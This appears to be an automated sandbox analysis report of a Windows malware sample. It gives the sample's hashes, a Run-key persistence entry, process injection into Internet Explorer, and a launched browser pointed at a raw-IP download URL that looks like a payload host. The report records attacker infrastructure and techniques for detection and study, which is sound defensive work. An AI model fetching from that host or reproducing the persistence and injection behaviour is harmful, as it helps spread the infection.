Analysis
-
max time kernel
144s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 11:51
Static task
static1
Behavioral task
behavioral1
Sample
b4a225cce8536ab40a822649201a634e.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
b4a225cce8536ab40a822649201a634e.exe
Resource
win10v2004-20240226-en
General
-
Target
b4a225cce8536ab40a822649201a634e.exe
-
Size
139KB
-
MD5
b4a225cce8536ab40a822649201a634e
-
SHA1
e86ca2c3ba82fc614c3d558f0231a94cbfd3b52c
-
SHA256
6b7b67b18ef5729aef3acaf3b6b473bc600b0f22ae68593f08d4f4b1aa444521
-
SHA512
2047144db9d68d310f657ec67f69f99e5c33a7e3544a4aa2626789703d74a05dfdd823020bbdfce02740bb2faccd739db8fa6d1b43141ad7859a0238ab353cd5
-
SSDEEP
3072:b825EbE4Gsgj5t0q3FjyDwdhiKbR/s0MIwvlvofkkc/BBzZqlHvm:bp5ETGwq3FukdhD00MIBftc/BBzcVvm
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\IniciarPrograma = "\"C:\\Windows\\system32\\msniiasms.exe\"" b4a225cce8536ab40a822649201a634e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000838086218696cfa63c8c90dd01b02e8758fe8e0750bda33bb5462e3a181342c7000000000e8000000002000020000000a68b1faec5e89a425faa4d26d713120433df19e81081e0c8a66078767bbed43a900000004b35d13558cac6184880428b12abd9eacac9f62282b4448247d89c6dc5ffc681bf65f94c1d8e6488aaecbbf5bc7fae9913e32368256055be19f314d37fac4ea24fa08030b2b1bcb1f3653fd62866d9571e6f3f0dc84afb91b85f4a4d41c12f9d249b98c0f38c346fdaf57895b8e57655cca916ee7429f9b587b1d1b812ab6d8a52307fb46cce02bc0a0a6091123f04b340000000ad08a1f5555ea893314dd0e4a226d638bcd43637aca6c8fc32f1d3608170f160e653a6c09b28399da2e0f61b8e42031b075192e879a16275501441e32f18a821 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "415801391" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C2736DF1-DAE6-11EE-97FB-6A55B5C6A64E} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 208a7ab0f36eda01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000fb7b12fce5f28d16de6ca6cbe94770891ab5644165e5d0d8404a9c7b29a481c5000000000e8000000002000020000000f66869c46166b0c4a8777e42e341cfe81cd655064f75098bb04cf382f39b4aa220000000b06952cd2570323b4dffdf6c0000db9bd7ad9a40d1582fc071124d6676114d2a4000000043f3c63dee92e95c7802c847ba8a37a72e5f2a03b1f20a9c97b781636a9aabbccd4070239fdc2732f3ec7ec1028c1bf6f3e54067d46d086448db4efc2b980ed7 iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2884 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2884 iexplore.exe 2884 iexplore.exe 2512 IEXPLORE.EXE 2512 IEXPLORE.EXE 2512 IEXPLORE.EXE 2512 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1808 wrote to memory of 2884 1808 b4a225cce8536ab40a822649201a634e.exe 28 PID 1808 wrote to memory of 2884 1808 b4a225cce8536ab40a822649201a634e.exe 28 PID 1808 wrote to memory of 2884 1808 b4a225cce8536ab40a822649201a634e.exe 28 PID 1808 wrote to memory of 2884 1808 b4a225cce8536ab40a822649201a634e.exe 28 PID 2884 wrote to memory of 2512 2884 iexplore.exe 29 PID 2884 wrote to memory of 2512 2884 iexplore.exe 29 PID 2884 wrote to memory of 2512 2884 iexplore.exe 29 PID 2884 wrote to memory of 2512 2884 iexplore.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\b4a225cce8536ab40a822649201a634e.exe"C:\Users\Admin\AppData\Local\Temp\b4a225cce8536ab40a822649201a634e.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://64.183.165.5/down/Novembro/2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2884 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2512
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5af406500fa11a593e4e0f0d71313f217
SHA1f2e605db920f1eb4ffa4961dcfbf6084e7cf7c78
SHA25624b7206f3d54d6f8427f9f8ef7696d9d1b463ecde40de2b4a7e0d6bf70784002
SHA5126a02dade783c133e3777116162c1c64aa6bb9e31e6347b4a48d3e7f0687684cd7a88fd553f840273a6d5806e4b9a5ad3d49b08dc0c5d8d3e6d6c94bada58cfc9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5e7104ff63b7528d645999a722427ab29
SHA1d2a27bb25cce1aa0c6530a8e040a4651f330f50a
SHA256228a98d7dc2d81b23fc41ba83eb013e2f8e294ed732340962980a03a506a3a39
SHA512a096207f56787914b57b106a4de259f8e6b57679f52f08371232cfea103a6a0dd56e4e302f8db1911bf42f82ba0d7ad0bc975270ecfb11fb64f1cb1f1da7e3a7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5cab9a8bfc54486a242521bfe2cd77c54
SHA18c864623de081894d47938d7cabcfe844d05f169
SHA256d49008d02f387b91d30393a11def0c20df1d09087003b4ff5a179f5318e1dfbf
SHA512672969348b2a1131f43acae7db7eb4a6ed8bca187d885a3f05830427556dafd8b04fed3aa05e2bd4ba0d22fa5f3754ff0580ec187f0d1319a17ed7bc78366931
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD555b0277e95c959ac736f463443bb1a6b
SHA1f08d31adf761f48262b180c451477db439e71349
SHA2567db3677d830f2eefd68a466b477987a6ae71cba6ba29a80c14c5afa3e42a7aa2
SHA51221df4aba8cf4ac1a49ad0cde2aebc4ac04a26430304d3a24bbf49605828859a603ac5c0cc9e84788c61305de7ddd0373612ed779565839b60f2c6691057e6660
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5c350b1ba625482f80ae62e287f4a2f74
SHA12294510197d274cbc91d1aeed3e0067a94b6873e
SHA25629f06dbf6d01bb2049e7589025319ccbfa2921048122c9789d679c3e442f9560
SHA512a054f7d5b014e7b0f3d36283ad34e970830adbe1947b72c6de1018855a8adbcc0c285044473a4127f1d15265ac12f876dde82c1f5fd2c91526d7ef001c9f4474
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD529c00fd2608ee11852b9c73b81bf55bb
SHA1ced9cf267368291cf084d4544ca5ac541ee3e1c9
SHA256756b97628a213e230225655c9746e721877a6ea972fdd2c78f1fa3a6bc83f771
SHA5126292b40cfc03c4960fc24f5301446685513b58c19270b93786cabc8d5e91b900f052ab4730f007380203a7b3e62279e34074bc4c5abeff83361725efd2e2cf2d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5578400767c6ca7a9854cf7fafedadf29
SHA1f800f9768982f4ed9dad3f7602ffee71381f5689
SHA2561e9e7a37ce4c7d7033d4f2872b48dcfdc04ae5143ce1bbd093033bf00fead92d
SHA512d9cf371ba751ffb7bf37678d598482e998984cbdf128baec00f46b38165e7641a7545a21d3679327f15cac9c051bf73eabc2df7be24e57e5446cdda6658b8c83
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5ba68ba8117f0e022d9f900a209e85249
SHA1287fb710e012105b547de1ceae4d72970467a703
SHA256ebd85b4407de0d876e31db46e0072d1bd7f755e180a2fb5c2bb9a7b71d3ac3e1
SHA5124ab02b910f46cc291da72961c1c7f48c59b4c77bdcf7711be76409bfc7f5fb3706bdbe32437a11d832a4c82a756b23a2c1f9673064618889c8f61bf0772e36d9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD564bca73597040b0cc9a0774e24417ee7
SHA1609bdbc8014f3a1063608e5c1f3c0801910320e2
SHA2563bfdba2be62d8d6e6b8fa9884458f5c55cccb17788e1f3c14d7439f3f41350b4
SHA512419323c6cea320dbcfe17af2abbd1a78ccaf4630be55ea6b4187abe9be5a86c780e72bc51279121066bd076bce6dec5eac436f967dc9257b6c56e5bf732d54b6
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
175KB
MD5dd73cead4b93366cf3465c8cd32e2796
SHA174546226dfe9ceb8184651e920d1dbfb432b314e
SHA256a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63